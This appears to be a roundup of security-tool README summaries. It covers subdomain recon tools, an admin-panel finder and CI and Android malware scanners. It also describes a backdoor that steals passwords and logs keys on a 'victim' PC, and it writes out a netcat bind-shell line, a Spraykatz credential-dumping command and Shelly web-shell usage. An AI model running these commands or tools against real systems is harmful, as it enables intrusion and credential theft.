    ./lazyrecon.sh -d target.com

    Main Features
    • Create a dated folder with recon notes
    • Grab subdomains using:
      * Sublist3r, certspotter and crt.sh
      * DNS bruteforcing using massdns
    • Find any CNAME records pointing to unused cloud services like AWS
    • Probe for live hosts over ports 80/443
    • Grab screenshots of responsive hosts
    • Scrape the Wayback Machine for data:
      * Extract JavaScript files
      * Build a custom parameter wordlist, ready to be loaded later into Burp Intruder or any other tool
      * Extract any URLs with .jsp, .php or .aspx and store them for further inspection
    • Perform nmap on specific ports
    • Get DNS information about every subdomain
    • Perform dirsearch for all subdomains
    • Generate an HTML report with output from the tools above
    • Improved reporting and less output while doing the work
    • Dark mode for html reports

    New features
    • Directory search module is now MULTITHREADED (up to 10 subdomains scanned at a time)
    • Enhanced HTML reports with the ability to search for strings, endpoints, response sizes or status codes

    DEMO



    Installation & Requirements

    System Requirements
    • Recommended to run on a VPS with 1 vCPU and 2 GB RAM.

    Authors and Thanks
    This script makes use of tools developed by the following people:

    TO DO
    • Report only mode to generate reports for old dirsearch data
    • SubDomain exclusion
    Warning: This code was originally created for personal use; it generates a substantial amount of traffic, so please use it with caution.


    Findomain v0.9.3 - The Fastest And Cross-Platform Subdomain Enumerator


    The fastest and cross-platform subdomain enumerator.

    What can Findomain do?
    The table below gives you an idea of why you should use Findomain and what it can do for you. The domain used for the test was aol.com in the following BlackArch virtual machine:
    Host: KVM/QEMU (Standard PC (i440FX + PIIX, 1996) pc-i440fx-3.1)
    Kernel: 5.2.6-arch1-1-ARCH
    CPU: Intel (Skylake, IBRS) (4) @ 2.904GHz
    Memory: 139MiB / 3943MiB
    The tool used to measure the time was the time command in Linux.
    Enumeration Tool | Search Time   | Total Subdomains Found | CPU Usage | RAM Usage
    Findomain        | real 0m5.515s | 84110                  | Very Low  | Very Low
    Summary: 84110 subdomains in 5.5 seconds.

    Features
    • Subdomains monitoring: push data to Discord, Slack or Telegram webhooks. See Subdomains Monitoring for more information.
    • Multi-thread support for API querying, so the maximum time Findomain will take to search subdomains for any target is about 20 seconds.
    • Parallel support for subdomain resolution; in good network conditions it can resolve about 2000 subdomains per minute.
    • DNS over TLS support.
    • Specific IPv4 or IPv6 query support.
    • Discover subdomains without brute force: the tool uses Certificate Transparency logs and APIs.
    • Discover only resolved subdomains.
    • Discover subdomain IPs for data analysis.
    • Read the target from a user argument (-t) or file (-f).
    • Write all, or only resolved, subdomains to a single output file specified by the user.
    • Write results to automatically named TXT output file(s).
    • Ability to directly query the Findomain database created with Subdomains Monitoring for previously discovered subdomains.
    • Ability to import and work with data discovered by other tools.
    • Quiet mode to run silently.
    • Cross-platform support: any platform; it's written in Rust and Rust is multiplatform. See the documentation for instructions.
    • Multiple API support.

    Findomain in depth
    See Subdomains Enumeration: what is, how to do it, monitoring automation using webhooks and centralizing your findings for a detailed guide including real world examples of how you get the most out of the tool.

    How does it work?
    The tool doesn't use the common methods for (sub)domain discovery; instead, it uses Certificate Transparency logs and specific, well-tested APIs to find subdomains. This method makes the tool much faster and more reliable. The tool makes use of multiple publicly available APIs to perform the search. If you want to know more about Certificate Transparency logs, read https://www.certificate-transparency.org/
    APIs that we are using at the moment:
    Notes
    APIs marked with **, require an access token to work. Search in the Findomain documentation how to configure and use it.
    APIs marked with * can optionally be used with an access token, create one if you start experiencing problems with that APIs. Search in the Findomain documentation how to configure and use it.
    More APIs?
    If you know other APIs that should be added, comment here.

    Development
    To make sure Findomain is not broken by some commit, I have created the develop branch, where new features and improvements are pushed before they go to the master branch. In short: the develop branch and beta releases aren't ready for production purposes, only for testing or development, while the master branch and non-beta releases are ready for production. If you are a developer or want to beta test the new features added to Findomain, use the develop branch; otherwise, always use the master branch. Every new feature is tested before it goes to master by the Findomain beta testers, who at the moment are only @sumgr0; I would appreciate it if you joined the testing process, just send me a DM on Twitter (@edu4rdshl).
    If you package Findomain for a distribution, always go for the master branch if using git, or non-beta releases if using the release model.
    Build the development version:
    You need to have rust, make and perl installed in your system first.
    $ git clone https://github.com/Edu4rdSHL/findomain.git -b develop # Only the develop branch is needed
    $ cd findomain
    $ cargo build --release
    $ ./target/release/findomain
    To update the repository when new commits are added, just go to the folder where Findomain's develop branch was cloned and execute:
    $ git pull
    $ cargo build --release
    $ ./target/release/findomain

    Installation
    We offer ready-to-use binaries for the following platforms (all are 64-bit only):
    If you need to run Findomain in another platform, continue reading the documentation.

    Build for 32 bits or another platform
    If you want to build the tool for your 32-bit system or another platform, follow these steps:
    Note: You need to have rust, make and perl installed in your system first.
    Using the crate:
    1. cargo install findomain
    2. Execute the tool from $HOME/.cargo/bin. See the cargo-install documentation.
    Using the Github source code:
    1. Clone the repository or download the release source code.
    2. Extract the release source code (only needed if you downloaded the compressed file).
    3. Go to the folder where the source code is.
    4. Execute cargo build --release
    5. Now your binary is in target/release/findomain and you can use it.

    Installation Android (Termux)
    Install the Termux package, open it and run the following commands:
    $ pkg install rust make perl
    $ cargo install findomain
    $ cd $HOME/.cargo/bin
    $ ./findomain

    Installation in Linux using source code
    If you want to install it, you can do that manually compiling the source or using the precompiled binary.
    Manually: You need to have rust, make and perl installed in your system first.
    $ git clone https://github.com/Edu4rdSHL/findomain.git
    $ cd findomain
    $ cargo build --release
    $ sudo cp target/release/findomain /usr/bin/
    $ findomain

    Installation in Linux using compiled artifacts
    $ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-linux
    $ chmod +x findomain-linux
    $ ./findomain-linux
    If you are using the BlackArch Linux distribution, you just need to use:
    $ sudo pacman -S findomain

    Installation Aarch64 (Raspberry Pi)
    $ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-aarch64
    $ chmod +x findomain-aarch64
    $ ./findomain-aarch64

    Installation Windows
    Download the binary from https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-windows.exe
    Open a CMD shell and go to the dir where findomain-windows.exe was downloaded.
    Exec: findomain-windows in the CMD shell.

    Installation MacOS
    $ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-osx
    $ chmod +x findomain-osx.dms
    $ ./findomain-osx.dms

    Updating Findomain to latest version
    To update Findomain to the latest version, you may be in one of the following scenarios:
    1. You downloaded a precompiled binary: If you are using a precompiled binary, then you need to download the new binary.
    2. You are using it from BlackArch Linux: Just run pacman -Syu
    3. You have cloned the repo and compiled it from source: You just need to go to the folder where the repo is cloned and run: git pull && cargo build --release, when finish, you have your executable in target/release/findomain.
    4. You downloaded a source code release and compiled it: You need to download the new source code release and compile it again.
    5. You used cargo install findomain: just run cargo install --force findomain.

    Access tokens configuration
    In this section you can find the steps for configuring APIs that need, or can optionally use, access tokens.

    Configuring the Facebook API
    History
    When I first added the Facebook CT API, I was providing a webhook token to search the API; consequently, when a lot of users were using the same token, the limit was reached and users couldn't search the Facebook API anymore until Facebook unlocked it again. Since Findomain version 0.2.2, users can set their own Facebook access token for the webhook and pass it to Findomain by setting the findomain_fb_token system variable. The change was introduced here. Also, since 23/08/2019 I have removed the webhook that was providing that API token and it will not work anymore; if you're using findomain < 0.2.2 you are affected, please use a version >= 0.2.2.
    Since Findomain 0.2.4 you don't need to explicitly set the findomain_fb_token variable in your system; if you don't set that variable, Findomain will use one of our provided access tokens for the Facebook CT API, otherwise, if you set the environment variable, Findomain will use your token. See this commit. Please, if you can create your own token, do it; the usage limit of shared access tokens is reached when a lot of people use them, and then the tool will fail.
    Getting the Webhook token
    The first step is to get your Facebook application token. You need to create a webhook; follow these steps:
    1. Open https://developers.facebook.com/apps/
    2. Click "Create App", put the name that you want and submit the information.
    3. In the next screen, select "Configure" in the Webhooks option.
    4. Go to "Configuration" -> "Basic" and click "Show" in the "App secret key" option.
    5. Now open the following URL in your browser: https://graph.facebook.com/oauth/access_token?client_id=your-app-id&client_secret=your-secret-key&grant_type=client_credentials
    Note: replace your-app-id with the number of your webhook identifier and your-secret-key with the key you got in the 4th step.
    6. You should get a JSON response like:
    {
        "access_token": "xxxxxxxxxx|yyyyyyyyyyyyyyyyyyyyyyy",
        "token_type": "bearer"
    }
    7. Save the access_token value.
    Now you can use that value to set the access token as following:
    Unix based systems (Linux, BSD, MacOS, Android with Termux, etc):
    Put in your terminal:
    $ findomain_fb_token="YourAccessToken" findomain -(options)
    Windows systems:
    Put in the CMD command prompt:
    > set findomain_fb_token=YourAccessToken && findomain -(options)
    Note: In Windows you need to escape special characters like |: add ^ before the special character and don't quote the token. Example: set findomain_fb_token=xxxxxxx^|yyyyyyyy && findomain -(options)
    Tip: If you don't want to write the access token every time you run findomain, export findomain_fb_token on Unix-based systems, e.g. by putting export findomain_fb_token="YourAccessToken" into your .bashrc, and set the findomain_fb_token variable on your Windows system as described here.

    Configuring the Spyse API to use with token
    1. Open https://account.spyse.com/register and complete the registration process (including email verification).
    2. Log in to your Spyse account and go to https://account.spyse.com/user
    3. Search for the "API token" section and click "Show".
    4. Save that access token.
    Now you can use that value to set the access token as following:
    Unix based systems (Linux, BSD, MacOS, Android with Termux, etc):
    Put in your terminal:
    $ findomain_spyse_token="YourAccessToken" findomain -(options)
    Windows systems:
    Put in the CMD command prompt:
    > set findomain_spyse_token=YourAccessToken && findomain -(options)
    Note: In Windows you need to escape special characters like |: add ^ before the special character and don't quote the token. Example: set findomain_spyse_token=xxxxxxx^|yyyyyyyy && findomain -(options)
    Tip: If you don't want to write the access token every time you run findomain, export findomain_spyse_token on Unix-based systems, e.g. by putting export findomain_spyse_token="YourAccessToken" into your .bashrc, and set the findomain_spyse_token variable on your Windows system as described here.

    Configuring the Virustotal API to use with token
    1. Open https://www.virustotal.com/gui/join-us and complete the registration process (including email verification).
    2. Log in to your VirusTotal account and go to https://www.virustotal.com/gui/user/YourUsername/apikey
    3. Search for the "API key" section.
    4. Save that API key.
    Now you can use that value to set the access token as following:
    Unix based systems (Linux, BSD, MacOS, Android with Termux, etc):
    Put in your terminal:
    $ findomain_virustotal_token="YourAccessToken" findomain -(options)
    Windows systems:
    Put in the CMD command prompt:
    > set findomain_virustotal_token=YourAccessToken && findomain -(options)
    Note: In Windows you need to escape special characters like |: add ^ before the special character and don't quote the token. Example: set findomain_virustotal_token=xxxxxxx^|yyyyyyyy && findomain -(options)
    Tip: If you don't want to write the access token every time you run findomain, export the respective system variable in your OS. For Unix-based systems this can be done by putting export VariableName="VariableValue" into your .bashrc. For Windows systems it can be done as described here or here.

    Subdomains Monitoring
    Findomain is capable of monitoring a specific domain or a list of domains for new subdomains and sending the data to Slack, Discord or Telegram webhooks. All you need is a server or computer with the PostgreSQL database server installed. Keep in mind that you can have a single central server/computer with PostgreSQL installed and connect to it from anywhere to perform the monitoring tasks.
    IMPORTANT NOTE: Findomain is a subdomain enumeration and monitoring tool, not a job scheduler. If you want to run Findomain automatically, you need to configure a job scheduler such as systemd timers or the well-known cron on *NIX systems, Termux on Android or Mac, and the Windows Task Scheduler on Windows.
    Options
    You can set the following command line options when using the subdomains monitoring feature:
    --postgres-database <postgres-database>    PostgreSQL database.
    --postgres-host <postgres-host>            PostgreSQL host.
    --postgres-password <postgres-password>    PostgreSQL password.
    --postgres-port <postgres-port>            PostgreSQL port.
    --postgres-user <postgres-user>            PostgreSQL username.
    System variables that can be configured
    Findomain reads system variables to make use of webhooks. Currently Findomain supports the following webhooks (click on them to see how to set up each webhook):
    The available system variables that you have are:
    findomain_discord_webhook: Discord webhook URL.
    findomain_slack_webhook: Slack webhook URL.
    findomain_telegrambot_token: Telegram bot authentication token.
    findomain_telegrambot_chat_id: Unique identifier for the target chat or username of the target channel.
    Tip: If you don't want to write the webhook parameters everytime that you run findomain, export the respective system variable in your OS. For Unix based systems it can be done putting export VariableName="VariableValue" into your .bashrc. For Windows system it can be done as described here or here.
    Default values while connecting to database server
    Findomain has some default values that are used when they are not set. They are listed below:
    1. If you only specify the -m flag without more arguments, or don't specify one of the options, Findomain sets:
    Subdomains monitoring examples
    1. Connect to the local computer and a local PostgreSQL server with a specific username, password and database, and push the data to both Discord and Slack webhooks
    $ findomain_discord_webhook='https://discordapp.com/api/webhooks/XXXXXXXXXXXXXXX' findomain_slack_webhook='https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX' findomain -m -t example.com --postgres-database findomain --postgres-user findomain --postgres-host localhost --postgres-port 5432
    2. Connect to a remote computer/server and remote PostgreSQL server with a specific username, password and database, and push the data to both Discord and Slack webhooks
    $ findomain_discord_webhook='https://discordapp.com/api/webhooks/XXXXXXXXXXXXXXX' findomain_slack_webhook='https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX' findomain -m -t example.com --postgres-user postgres --postgres-password psql  --postgres-host 192.168.122.130 --postgres-port 5432
    3. Connect to a remote computer/server and remote PostgreSQL server with a specific username, password and database, and push the data to a Telegram webhook
    $ findomain_telegrambot_token="Your_Bot_Token_Here" findomain_telegrambot_chat_id="Your_Chat_ID_Here" findomain -m -t example.com --postgres-user postgres --postgres-password psql  --postgres-host 192.168.122.130 --postgres-port 5432
    4. Connect to the local computer using the default values
    $ findomain_discord_webhook='https://discordapp.com/api/webhooks/XXXXXXXXXXXXXXX' findomain_slack_webhook='https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX' findomain -m -t example.com

    Usage
    See findomain -h/--help to see all the options.
    For subdomains monitoring examples, see Subdomains Monitoring for more information.
    You can use the tool in two ways, only discovering the domain name or discovering the domain + the IP address.

    Examples
    1. Make a simple search of subdomains and print the info to the screen:
    findomain -t example.com
    2. Make a search of subdomains and export the data to an output file (the output file name in this case is example.com.txt):
    findomain -t example.com -o
    3. Make a search of subdomains and export the data to a custom output file name:
    findomain -t example.com -u example.txt
    4. Make a search of only resolvable subdomains:
    findomain -t example.com -r
    5. Make a search of only resolvable subdomains, exporting the data to a custom output file:
    findomain -t example.com -r -u example.txt
    6. Search subdomains from a list of domains passed in a file (put one domain per line in the file):
    findomain -f file_with_domains.txt
    7. Search subdomains from a list of domains passed in a file (one domain per line) and save all the resolved domains to a custom file name:
    findomain -f file_with_domains.txt -r -u multiple_domains.txt
    8. Query the Findomain database created with Subdomains Monitoring:
    findomain -t example.com --query-database
    9. Query the Findomain database created with Subdomains Monitoring and save the results to a custom filename:
    findomain -t example.com --query-database -u subdomains.txt
    10. Import subdomains from several files and work with them in the Subdomains Monitoring process:
    findomain --import-subdomains file1.txt file2.txt file3.txt -m -t example.com


    OKadminFinder - Admin Panel Finder / Admin Login Page Finder

    OKadminFinder: an easy way to find the admin panel of a site.
    • Requirements
      • Linux
        sudo apt install tor
        sudo apt install python3-socks (optional)
        pip3 install --user -r requirements.txt
      • Windows
        download the Tor expert bundle
        pip3 install -r requirements.txt


    • Usage
      • Linux
        git clone https://github.com/mIcHyAmRaNe/okadminfinder3.git
        cd okadminfinder3
        chmod +x okadminfinder.py
        python3 okadminfinder.py
      • Windows
        download & extract zip
        cd okadminfinder3
        py -3 okadminfinder.py
      • Pentestbox (same procedure as Linux)
        you can add an alias by adding the line okadminfinder=py -3 "%pentestbox_ROOT%/bin/Path/to/okadminfinder3/okadminfinder.py" $* to the C://Pentestbox/bin/customtools/customaliases file; you'll then be able to launch it with okadminfinder

    Features
    • More than 500 potential admin panels
    • Tor & Proxy
    • Random-Proxy
    • Random-Agents
    • Command-line parameters, e.g.: okadminfinder.py -u example.com --proxy 127.0.0.1:8080 (see the sketch after this list)
    • Self-Update
    • Classify admin panel links by popularity
    • Multithreading, for faster work
    • Adding more potential admin panel pages
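    As a hedged sketch combining the Tor and proxy features above (this assumes Tor is listening on its default SOCKS port 9050 and that the --proxy flag accepts a SOCKS endpoint):
    # start the Tor service, then route OKadminFinder through its local SOCKS port
    sudo service tor start
    python3 okadminfinder.py -u example.com --proxy 127.0.0.1:9050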


    BetterBackdoor - A Backdoor With A Multitude Of Features

    A backdoor is a tool used to gain remote access to a machine.
    Typically, backdoor utilities such as netcat have two main functions: to pipe remote input into cmd or bash, and to pipe the output back. This is useful, but it is also limited. BetterBackdoor overcomes these limitations by including the ability to inject keystrokes, take screenshots, transfer files, and perform many other tasks.
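    For comparison, a minimal sketch of the classic netcat pipe described above (the port is arbitrary, and the -e option only exists in traditional netcat builds):
    # on the victim: expose /bin/bash on TCP port 4444
    nc -l -p 4444 -e /bin/bash
    # on the attacker: connect and type shell commands
    nc victim_ip 4444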

    Features
    BetterBackdoor can create and control a backdoor.
    This created backdoor can:
    • Run Command Prompt commands
    • Run PowerShell scripts
    • Run DuckyScripts to inject keystrokes
    • Exfiltrate files based on extension
    • Exfiltrate Microsoft Edge and WiFi passwords
    • Send and receive files to and from the victim's computer
    • Start a keylogger
    • Get a screenshot of the victim's computer
    • Get text copied to the victim's clipboard
    • Get the contents of a victim's file (cat)

    This backdoor uses a client and server socket connection to communicate. The attacker starts a server and the victim connects to this server as a client. Once a connection is established, commands can be sent to the client in order to control the backdoor.
    To create the backdoor, BetterBackdoor:
    • Creates 'run.jar', the backdoor jar file, and copies it to the directory 'backdoor'.
    • Appends a text file containing the server's IPv4 address to 'run.jar'.
    • If desired, copies a Java Runtime Environment to 'backdoor' and creates batch file 'run.bat' for running the backdoor in the packaged Java Runtime Environment.
    To start the backdoor on a victim PC, transfer all files from the directory 'backdoor' onto the victim PC.
    If a JRE is packaged with the backdoor, execute run.bat, otherwise execute run.jar.
    This will start the backdoor on the victim's PC.
    Once running, to control the backdoor you must return to BetterBackdoor and run option 1 at start while connected to the same WiFi network as the victim's computer.

    Requirements
    • A Java JDK distribution >=8 must be installed and added to PATH.
    • You must use the same computer to create and control the backdoor.
      • The computer used to create the backdoor must be on the same WiFi network as the victim's computer.
      • The IPv4 address of this computer must remain static in the time between creating the backdoor and controlling it.
    • The computer used to control the backdoor must have its firewall deactivated, and if the computer runs a Unix OS, BetterBackdoor must be run with 'sudo'.

    Compatibility
    BetterBackdoor is compatible with Windows, Mac, and Linux, while the backdoor is only compatible with Windows.

    Installation
    # clone BetterBackdoor
    git clone https://github.com/ThatcherDev/BetterBackdoor.git

    # change the working directory to BetterBackdoor
    cd BetterBackdoor

    # build BetterBackdoor with Maven
    # for Windows run
    mvnw.cmd clean package

    # for Linux run
    chmod +x mvnw
    ./mvnw clean package

    # for Mac run
    sh mvnw clean package

    Usage
    java -jar betterbackdoor.jar


    Spraykatz - A Tool Able To Retrieve Credentials On Windows Machines And Large Active Directory Environments


    Spraykatz is a tool without any pretension, able to retrieve credentials on Windows machines and across large Active Directory environments.
    It simply runs procdump on target machines and parses the dumps remotely, in order to avoid detection by antivirus software as much as possible.

    Installation
    This tool is written for Python >= 3. Do not use it in production environments!

    Ubuntu
    On a fresh updated Ubuntu.
    apt update
    apt install -y python3.6 python3-pip git nmap
    git clone --recurse-submodules https://github.com/aas-n/spraykatz.git
    cd spraykatz
    pip3 install -r requirements.txt

    Using Spraykatz
    A quick start could be:
    ./spraykatz.py -u H4x0r -p L0c4L4dm1n -t 192.168.1.0/24

    Mandatory arguments

    Switches          Description
    -u, --username    User to spray with. The user must have admin rights on the targeted systems in order to gain remote code execution.
    -p, --password    User's password, or NTLM hash in the LM:NT format.
    -t, --targets     IP addresses and/or IP address ranges. You can submit them via a file of targets (one target per line) or inline (separated by commas).

    Optional arguments
    Switches          Description
    -d, --domain      User's domain. If the user is not a domain member, simply use -d . instead.
    -v, --verbosity   Verbosity mode {warning, info, debug}. Default: info.
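    Putting the switches together, a hedged example run (the domain, credentials, and targets file are placeholders; the hash shown is the well-known empty LM:NT pair):
    ./spraykatz.py -d CORP -u H4x0r -p aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -t targets.txt -v debug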

    Acknowledgments
    Spraykatz uses slightly modified parts of the following projects:


    Written by Lydéric Lefebvre


    Shelly - Simple Backdoor Manager With Python (Based On Weevely)


    Shelly is a simple tool written in Python for remotely controlling a website.

    Installation:
    $ git clone https://github.com/tegal1337/Shelly
    $ cd Shelly
    $ python3 shell.py

    Requirements:
    sudo pip install -r requirements.txt

    Example:

    python3 shell.py -g backdoor -p tegal1337
    [ASCII art banner: Shelly v.1 | Python shell - Tegal1337]
    Generate:
    [+] ./backdoor.py -g "shell_name" -p "password"
    Connect to server:
    [+] ./backdoor.py -u "shell_url" -p "password"

    The backdoor is successfully created with the name backdoor.php and the password tegal1337:

    dalpan@Tegal1337:~/Tools$ mv backdoor.php /opt/lampp/htdocs/php-futsal/
    dalpan@Tegal1337:~/Tools$ python3 shell.py -u "http://localhost/php-futsal/backdoor.php" -p tegal1337
    /opt/lampp/htdocs/php-futsal$ id
    uid=1(daemon) gid=1(daemon) groups=1(daemon)


    Contact:
    • Email : contact@dalpan.co
    • FB : fb.com/dalpan.me


    huskyCI - Performing Security Tests Inside Your CI


    huskyCI is an open-source tool that performs security tests inside CI pipelines of multiple projects and centralizes all results into a database for further analysis and metrics.

    How does it work?
    The main goal of this project is to help development teams improve the quality of their code by finding vulnerabilities as quickly as possible, and thus addressing them.
    huskyCI can perform static security analysis in Python (Bandit and Safety), Ruby (Brakeman), JavaScript (Npm Audit and Yarn Audit), Golang (Gosec), and Java (SpotBugs plus Find Sec Bugs). It can also audit repositories for secrets like AWS Secret Keys, Private SSH Keys, and many others using GitLeaks. You should check our wiki to better understand how this tool could help secure your organization's projects!

    Requirements

    Docker and Docker-Compose
    The easiest way to deploy huskyCI locally is by using Docker and Docker Compose, thus you should have them installed on your machine.

    Golang
    You must also have Go installed and huskyCI needs to be inside your $GOPATH to run properly.

    Installing
    After cloning this repository, simply run the command inside huskyCI's folder:
    make install

    Running
    After installing, a .env file with settings for huskyCI should have been generated:
    $ cat .env
    export HUSKYCI_CLIENT_REPO_URL="https://github.com/globocom/huskyCI.git"
    export HUSKYCI_CLIENT_REPO_BRANCH="vulns-Golang"
    export HUSKYCI_CLIENT_API_ADDR="http://localhost:8888"
    export HUSKYCI_CLIENT_API_USE_HTTPS="false"
    export HUSKYCI_CLIENT_TOKEN="{YOUR_TOKEN_HERE}"
    You can change the repository and branch being analysed by modifying the contents of HUSKYCI_CLIENT_REPO_URL and HUSKYCI_CLIENT_REPO_BRANCH. Then simply source it through the command:
    . .env
    Mac OS:
    make run-client
    Linux:
    make run-client-linux
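    For example, a hedged sketch of pointing the client at your own repository (the URL and branch are placeholders; the variables are the ones documented above):
    . .env
    export HUSKYCI_CLIENT_REPO_URL="https://github.com/your-org/your-repo.git"
    export HUSKYCI_CLIENT_REPO_BRANCH="main"
    make run-client-linux   # or make run-client on macOS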

    Frontend
    huskyCI also has a cool frontend built in React, so you can check some stats regarding your huskyCI results! After running your first scan, simply visit:
    http://localhost:8080


    Documentation
    You can find huskyCI documentation here.



    AttackSurfaceMapper - A Tool That Aims To Automate The Reconnaissance Process


    AttackSurfaceMapper is a reconnaissance tool that uses a mixture of open source intelligence (OSINT) and active techniques to expand the attack surface of your target. You feed in a mixture of one or more domains, subdomains and IP addresses, and it uses numerous techniques to find more targets: it enumerates subdomains with bruteforcing and passive lookups, finds other IPs of the same network block owner, IPs that have multiple domain names pointing to them, and so on.
    Once the target list is fully expanded, it performs passive reconnaissance on the targets: taking screenshots of websites, generating visual maps, looking up credentials in public breaches, passive port scanning with Shodan, and scraping employees from LinkedIn.

    Setup
    As this is a Python based tool, it should theoretically run on Linux, ChromeOS (Developer Mode), macOS and Windows.
    [1] Download AttackSurfaceMapper
    $ git clone https://github.com/superhedgy/AttackSurfaceMapper
    [2] Install Python dependencies
    $ cd AttackSurfaceMapper
    $ python3 -m pip install --no-cache-dir -r requirements.txt
    [3] Add optional API keys to enable more data gathering
    Register and obtain API keys from the supported services, then edit and enter the keys in the keylist file:
    $ nano keylist.asm

    Example run command
    $ python3 asm.py -t your.site.com -ln -w resources/top100_sublist.txt -o demo_run

    Optional Parameters
    Additional optional parameters can be set to include active reconnaissance modules in addition to the default passive ones.
    |<------ AttackSurfaceMapper - Help Page ------>|

    positional arguments:
    targets Sets the path of the target IPs file.

    optional arguments:
    -h, --help show this help message and exit
    -f FORMAT, --format FORMAT
    Choose between CSV and TXT output file formats.
    -o OUTPUT, --output OUTPUT
    Sets the path of the output file.
    -sc, --screen-capture
    Capture a screen shot of any associated Web Applications.
    -sth, --stealth Passive mode allows reconnaissance using OSINT techniques only.
    -t TARGET, --target TARGET
    Set a single target IP.
    -V, --version Displays the current version.
    -w WORDLIST, --wordlist WORDLIST
    Specify a list of subdomains.
    -sw SUBWORDLIST, --subwordlist SUBWORDLIST
    Specify a list of child subdomains.
    -e, --expand Expand the target list recursively.
    -ln, --linkedinner Extracts emails and employees details from linkedin.
    -v, --verbose Verbose output in the terminal window.

    Authors: Andreas Georgiou (@superhedgy)
    Jacob Wilkin (@greenwolf)


    Pylane - A Python VM Injector With Debug Tools, Based On GDB


    Pylane is a Python VM injector with debug tools, based on gdb and ptrace. Pylane uses gdb to attach to a Python process, then injects code into its Python VM and runs it.

    Usage
    Use the inject command to inject a Python script into a process:
    pylane inject <PID> <YOUR_PYTHON_FILE>
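    As a hedged sketch of that workflow (the PID and script path are hypothetical; anything the injected code prints goes to the target process's stdout):
    # write a one-off probe script, then inject it into the target process
    cat > /tmp/probe.py <<'EOF'
    import threading
    # list the thread names of the process we were injected into
    print([t.name for t in threading.enumerate()])
    EOF
    pylane inject 1234 /tmp/probe.py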
    Use the shell command to inject an interactive shell:
    pylane shell <PID>
    Pylane shell features:
    • uses IPython as its interactive interface, supporting magic functions like ? and %
    • supports remote automatic completion
    • provides debug toolkit functions, such as:
      • lookup class or instance by name
      • get source code of an object
      • print all threads' stack and locals

    Install
    pip install pylane
    Pylane should be installed in the virtualenv the target process uses, or in the OS Python library path.
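    For instance, a minimal sketch for a target that runs inside a virtualenv (the path and PID are hypothetical):
    # install pylane into the target's virtualenv and attach a shell to PID 1234
    /srv/app/venv/bin/pip install pylane
    /srv/app/venv/bin/pylane shell 1234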

    Compatibility
    Supports Linux and BSD.


    PAKURI - Penetration Test Achieve Knowledge Unite Rapid Interface


    What's PAKURI
    In Japanese, imitating is called “Pakuru”.
    ぱくる (godan conjugation, hiragana and katakana パクる, rōmaji pakuru)
    1. eat with a wide open mouth
    2. steal when one isn't looking, snatch, swipe
    3. copy someone's idea or design
    4. nab, be caught by the police
    Wiktionary:ぱくる

    Description
    Pentesters love to move their hands. However, I do not like troublesome work. Simple work is performed semi-automatically with simple operations: PAKURI executes commands frequently used in penetration tests by simply operating the numeric keypad. You can run a penetration test as if you were playing a fighting game.

    Abilities of "PAKURI".
    • Intelligence gathering.
    • Vulnerability analysis.
    • Visualize.
    • Brute Force Attack.
    • Exploitation.

    Your benefits.
    By using our PAKURI, you will benefit from the following.
    For redteam:
    (a) It saves you the trouble of entering frequently used commands.
    (b) Beginner pentesters can learn the flow of attacks using PAKURI.
    For blueteam:
    (c) Attack packets can be generated with a simple operation.
    NOTE: If you are interested, please use PAKURI in an environment under your control and at your own risk. If you execute PAKURI against systems that are not under your control, it may be considered an attack and you may be held legally liable for your actions.

    Install
    bash install.sh

    Usage
    root@kali:/usr/share/pakuri# ./pakuri.sh

    [Menu screenshots: Main, Scanning, Exploit, Config, Command]

    Operation check environment
    • OS: Kali Linux 2019.4
    • Memory: 8.0GB
    This tool is not yet complete. It will be updated sequentially.


    Malwinx - Just A Normal Flask Web App To Understand Win32Api With Code Snippets And References

    A normal flask web app to learn win32api with code snippets and references.

    Prerequisite
    You need to install the following packages before starting:
    pip install flask
    pip install pefile
    pip install requests
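    Equivalently, the three dependencies can be installed in a single command:
    pip install flask pefile requests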

    Usage
    $ python flaskapp.py

    Here is the walkthrough:
    1. Upload the exe or dll.
    2. The functions of the exe or dll will appear.
    3. Just click on any of the functions. For example purposes, let's choose LoadLibraryA.
    4. The code usage of any function can be extracted by clicking on these options.



    Quark-Engine - An Obfuscation-Neglect Android Malware Scoring System


    An Obfuscation-Neglect Android Malware Scoring System


    Concepts
    Android malware analysis engines are not a new story. Every antivirus company has its own secrets for building one. Out of curiosity, we developed a malware scoring system from the perspective of Taiwan's criminal law, in an easy but solid way.
    Criminal law has an order theory that explains the stages of committing a crime. For example, the crime of murder consists of five stages: determination, conspiracy, preparation, start, and practice. The later the stage, the more certain we are that the crime was actually carried out.
    Following the same principle, we developed our order theory of Android malware, with five stages for judging whether a malicious activity is being practiced: 1. Permission requested. 2. Native API call. 3. Certain combination of native APIs. 4. Calling sequence of native APIs. 5. APIs that handle the same register. We not only define malicious activities and their stages but also develop weights and thresholds for calculating the threat level of a malware sample.
    Malware evolves with new techniques that make reverse engineering more difficult, and obfuscation is one of the most commonly used. Here we present a Dalvik bytecode loader, built on the order theory of Android malware, that neglects certain cases of obfuscation.
    The Dalvik bytecode loader provides functionalities such as 1. finding cross references and calling sequences of native APIs, and 2. tracing bytecode registers. The combination of these functionalities (yes, the order theory) not only neglects obfuscation but also matches perfectly the design of our malware scoring system.

    Detail Report
    This is how we examine a real Android malware sample (candy corn) with one single rule (crime):
    $ quark -a sample/14d9f1a92dd984d6040cc41ed06e273e.apk \
    -r rules/ \
    --detail


    Summary Report
    Examine it with the rules:
    quark -a sample/14d9f1a92dd984d6040cc41ed06e273e.apk \
    -r rules/ \
    --easy


    Installation
    $ git clone https://github.com/quark-engine/quark-engine.git; cd quark-engine/quark
    $ pipenv install
    $ pipenv shell
    $ python setup.py install
    Make sure your Python version is 3.7, or edit the Pipfile to match the version you have.
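    For instance, a hedged sketch of relaxing the version pin (this assumes the Pipfile carries the usual [requires] section with python_version = "3.7"):
    # point the Pipfile at your local Python version, e.g. 3.8
    sed -i 's/python_version = "3.7"/python_version = "3.8"/' Pipfile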

    Usage
    $ quark --help
    usage: quark [-h] [-e] [-d] -a APK -r RULE

    optional arguments:
    -h, --help show this help message and exit
    -e, --easy show easy report
    -d, --detail show detail report
    -a APK, --apk APK APK file
